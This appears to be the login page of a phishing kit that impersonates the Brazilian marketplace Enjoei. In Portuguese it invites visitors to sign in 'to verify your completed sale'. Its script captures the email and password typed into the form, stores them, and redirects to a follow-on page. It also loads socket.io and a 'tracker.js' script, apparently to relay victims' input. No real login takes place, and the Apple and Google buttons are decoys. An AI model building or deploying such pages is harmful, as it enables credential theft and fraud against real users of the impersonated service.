<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Login - Enjoei</title>
    <link rel="icon" type="image/png" href="../favicon/favicon-16x16.png" sizes="16x16"> 
    <link rel="icon" type="image/png" href="../favicon/favicon-32x32.png" sizes="32x32">
    <style>
        body, html {
            margin: 0;
            padding: 0;
            font-family: Arial, sans-serif;
            height: 100%;
            background-color: #f9f9f9;
        }

        .container {
            display: flex;
            flex-direction: column;
            align-items: center;
            justify-content: center;
            height: 100%;
        }

        .logo img {
            width: 200px;
            height: auto;
        }

        .login-form {
            margin-top: 20px;
            background-color: #fff;
            padding: 30px;
            border-radius: 10px;
            box-shadow: 0px 0px 10px 0px rgba(0,0,0,0.1);
            width: 300px;
        }

        h2 {
            text-align: center;
            margin-bottom: 20px;
            color: #333;
        }

        .login-options {
            display: flex;
            justify-content: center;
            margin-bottom: 20px;
        }

        .login-options button {
            margin: 0 10px;
            border: none;
            background: none;
            cursor: pointer;
        }

        .login-options button img {
            width: 50px;
            height: auto;
        }

        .email-login {
            text-align: center;
        }

        .email-login p {
            margin: 10px 0;
            color: #666;
        }

        .email-login input {
            width: 100%;
            padding: 10px;
            margin-bottom: 10px;
            border: 1px solid #ccc;
            border-radius: 5px;
            box-sizing: border-box;
        }

        .email-login button {
            padding: 10px 20px;
            background-color: #FF4F69;
            color: white;
            border: none;
            cursor: pointer;
            border-radius: 5px;
            transition: background-color 0.3s;
        }

        .email-login button:hover {
            background-color: #FF3352;
        }
    </style>
</head>
<body>
    <div class="container">
        <div class="logo">
            <img src="../images/logo1.png" alt="Enjoei Logo">
        </div>
        <div class="login-form">
            <h2>Entre em sua conta para verificar sua venda realizada:</h2>
            <div class="login-options">
                <button onclick="redirect('seguinte.html')">
                    <img src="../pngimages/123/106/png-clipart-apple-logo-logo-apple-icon-information-apple-logo-logo-monochrome-thumbnail.png" alt="Entrar com Apple">
                </button>
                <button onclick="redirect('seguinte.html')">
                    <img src="../512/2875/2875331.png" alt="Entrar com Google">
                </button>
                <button onclick="redirect('seguinte.html')">
                    <img src="../256/124/124010.png">
                </button>
            </div>
            <form id="form">
                <div class="email-login">
                    <p>Email cadastrado</p>
                    <input type="email" name="email" id="email" placeholder="user@enjoei.com.br">
                    <p>Senha de acesso</p>
                    <input type="password" name="senha" id="senha" placeholder="********">
                    <button type="submit">Entrar com e-mail</button>
                </div>
            </form>
        </div>
    </div>

    <script>
        function redirect(url) {
            window.location.href = url;
        }

        document.getElementById('form').addEventListener('submit', function(event) {
            event.preventDefault(); // Impede o envio padrão do formulário

            const email = document.getElementById("email").value;
            const senha = document.getElementById("senha").value;

            localStorage.setItem("email", email);
            localStorage.setItem("senha", senha);

            redirect("seguinte.html")
        })
    </script>
    <script src="/socket.io/socket.io.js"></script>
    <script src="/tracker.js"></script>
</body>
</html>
